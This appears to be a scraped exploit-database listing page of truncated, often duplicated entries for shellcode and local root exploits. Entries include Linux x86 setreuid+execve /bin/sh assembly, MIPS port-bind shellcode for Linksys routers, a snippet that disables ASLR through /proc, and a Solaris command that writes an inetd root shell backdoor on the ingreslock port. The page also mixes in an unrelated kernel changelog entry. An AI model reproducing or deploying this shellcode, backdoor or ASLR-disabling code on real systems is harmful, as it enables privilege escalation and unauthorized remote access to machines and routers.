linux/86 setreuid(geteuid geteuid) + execve(/bin/sh) shellcode

No description provided by source. / setreuidgeteuid, geteuid + execve/bin/sh shellcode - useful for wargames and the like. global start section .text start: ; geteuid push byte 49 pop eax int 0x80 ; setreuid mov ebx, eax mov ecx, eax push byte 70 pop eax int 0x80 ; execve xor eax,eax push eax pu...

linux/86 setreuidgeteuid, geteuid + execve/bin/sh shellcode

linux/86 setreuidgeteuid, geteuid + execve/bin/sh shellcode. Shellcode exploit for linx86 platform / setreuidgeteuid, geteuid + execve/bin/sh shellcode - useful for wargames and the like. global start section .text start: ; geteuid push byte 49 pop eax int 0x80 ; setreuid mov ebx, eax mov ecx, ea...

freebsd/x86 encrypted shellcode /bin/sh 48 bytes

Exploit for freebsd/x86 platform in category shellcode ================================================ freebsd/x86 encrypted shellcode /bin/sh 48 bytes ================================================ / Encoded SUB shellcode execve /bin/sh of 48 bytes by email protected Hack 'n Roll / char...

linux/x86 setreuid(geteuid, geteuid) + execve(/bin/sh) shellcode

Exploit for linux/x86 platform in category shellcode =============================================================== linux/x86 setreuidgeteuid, geteuid + execve/bin/sh shellcode =============================================================== / setreuidgeteuid, geteuid + execve/bin/sh shellcode -...

linux/mips (Linksys WRT54G/GL) execve shellcode 60 bytes

No description provided by source. / - MIPS little-endian - linux execve 60 bytes shellcode - execve"/bin/sh","/bin/sh",; - tested on Linksys WRT54G/GL DD-WRT Linux - based on scut paper Writing MIPS/Irix shellcode vaicebine at gmail dot com / include stdio.h char shellcode = "\x50\x73\x06\x24" /...

linux/mips (Linksys WRT54G/GL) port bind shellcode 276 bytes

No description provided by source. / - MIPS little-endian - linux port listener 276 bytes shellcode - execve"/bin/sh","/bin/sh",; - port 0x1337 4919 - tested on Linksys WRT54G/GL DD-WRT Linux - based on scut paper Writing MIPS/Irix shellcode vaicebine at gmail dot com / include stdio.h char...

linux/x86 - setuid0 . setgid0 . aslr_off 79 bytes

linux/x86 setuid0 . setgid0 . aslroff 79 bytes. Shellcode exploit for linx86 platform / Linux/x86 Fedora 8 setuid0 + setgid0 + execve"echo 0 /proc/sys/kernel/randomizevaspace" by LiquidWorm 2008 c www.zeroscience.org liquidworm at gmail.com 79 bytes. / char sc = "\x6a\x17" // push $0x17 "\x58" //...

linux/mips (Linksys WRT54G/GL) port bind shellcode 276 bytes

Exploit for linux/mips platform in category shellcode ============================================================ linux/mips Linksys WRT54G/GL port bind shellcode 276 bytes ============================================================ / - MIPS little-endian - linux port listener 276 bytes shellco...

linux/mips - Linksys WRT54G/GL port bind shellcode 276 bytes

linux/mips Linksys WRT54G/GL port bind shellcode 276 bytes. Shellcode exploit for linuxmips platform / - MIPS little-endian - linux port listener 276 bytes shellcode - execve"/bin/sh","/bin/sh",; - port 0x1337 4919 - tested on Linksys WRT54G/GL DD-WRT Linux - based on scut paper Writing MIPS/Irix...

linux/mips - Linksys WRT54G/GL execve shellcode 60 bytes

linux/mips Linksys WRT54G/GL execve shellcode 60 bytes. Shellcode exploit for linuxmips platform / - MIPS little-endian - linux execve 60 bytes shellcode - execve"/bin/sh","/bin/sh",; - tested on Linksys WRT54G/GL DD-WRT Linux - based on scut paper Writing MIPS/Irix shellcode vaicebine at gmail d...

linux/x86 setuid(0) . setgid(0) . aslr_off 79 bytes

Exploit for linux/x86 platform in category shellcode =================================================== linux/x86 setuid0 . setgid0 . aslroff 79 bytes =================================================== / Linux/x86 Fedora 8 setuid0 + setgid0 + execve"echo 0 /proc/sys/kernel/randomizevaspace" by...

linux/x86 setuid(0) . setgid(0) . aslr_off 79 bytes

No description provided by source. / Linux/x86 Fedora 8 setuid0 + setgid0 + execve"echo 0 /proc/sys/kernel/randomizevaspace" by LiquidWorm 2008 c www.zeroscience.org liquidworm at gmail.com 79 bytes. / char sc = "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx, %ebx "\xcd\x80" /...

linux/mips (Linksys WRT54G/GL) execve shellcode 60 bytes

Exploit for linux/mips platform in category shellcode ======================================================== linux/mips Linksys WRT54G/GL execve shellcode 60 bytes ======================================================== / - MIPS little-endian - linux execve 60 bytes shellcode -...

Aeon 0.2a Local Linux Exploit (perl code)

No description provided by source. !/usr/bin/perl Aeon-mail relay agent for Linux written by lammat just for practice purposes tested against aeon-0.2a http://grpower.ath.cx [email protected] execve/bin/sh for linux x86 29 bytes by Matias Sedalo $shellcode =...

Linux Kernel < 2.4.20 Module Loader Local Root Exploit

No description provided by source. / Linux Kernel Module Loader Local R00t Exploit Up to 2.4.20 By anonymous KuRaK include stdio.h include stdlib.h include signal.h include fcntl.h include errno.h include unistd.h include sys/types.h include sys/stat.h include sys/ptrace.h include sys/wait.h...

linux/mips execve /bin/sh 56 bytes

No description provided by source. / 56 bytes execve /bin/sh shellcode - linux-mipsel - by core [email protected] Note: For MIPS running in little-endian mode. Tested on a Cobalt Qube2 server running Linux 2.4.18 Greetz to bighawk... i couldn't get his execve to work for some reason :/ / char code ...

solaris/x86 execve /bin/sh toupper evasion 84 bytes

No description provided by source. / Solaris/x86 Used for toupper evasion look to the linux version for an explanation and usage example. / char c0de = / main: / "\xeb\x33" / jmp callz / / start: /...

solaris/x86 add services and execve inetd 201 bytes

No description provided by source. / Solaris/x86 Just execve's the following: "echo "ingreslock stream tcp nowait root /bin/sh sh -i"/tmp/x;" "/usr/sbin/inetd -s /tmp/x; /bin/rm -f /tmp/x"; for a trivial remote bd. Used in a few old Solaris/x86 remote exploits. / ...

Moderate: kernel security and bug fix update

2.6.9-67.0.7.0.1.EL - fix skb alignment that was causing sendto to fail with EFAULT Olaf Kirch orabug 6845794 - fix entropy flag in bnx2 driver to generate entropy pool John Sobecki orabug 5931647 - fix enomem due to larger mtu size page alloc Zach Brown orabug 5486128 - fix percpu api bugon with...

Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit

No description provided by source. / Copyright C 2007-2008 Subreption LLC. All rights reserved. Visit http://blog.subreption.com for exploit development notes. References: CVE-2007-3876 http://docs.info.apple.com/article.html?artnum=307179...